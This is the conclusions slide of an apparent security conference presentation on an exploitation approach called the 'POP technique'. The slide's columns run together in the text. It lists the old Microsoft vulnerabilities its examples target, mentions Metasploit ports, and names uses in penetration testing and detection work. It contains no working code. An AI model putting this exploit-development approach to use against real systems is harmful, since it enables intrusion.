  • 124. Conclusions • Some examples, applying POP technique, will be • The POP technique is not part of any commercial or available. For further details, please refer to: public tool and is freely available, although the – http://about.me/nbrito examples were ported to work with Rapid7 Metasploit Framework – this is to show how flexible its approach and deployment is – hoping it can help people to • POP examples are licensed under GNU General understand the threat, improving their infra- Public License version 2. structure, security solutions and development approach. • The examples cover pretty old vulnerabilities, such as: – MS02-039: 3,307 days since published. • POP technique can be freely applied, there are no – MS02-056: 3,237 days since published. restrictions… No other than laziness. – MS08-078: 969 days since published. – MS09-002: 914 days since published. • POP technique can help different people, performing different tasks, such as: • POP is also not new: – Penetration-testing. – Encore-NG: 1,056 days since BUGTRAQ and – Exploit and proof-of-concept tools FULL-DISCLOSURE. development. – ENG++ : 622 days since H2HC 6th Edition. – Security solutions evaluation and tests. – Security solution Quality -Assurance . – Detection and protection mechanisms development. – Etc…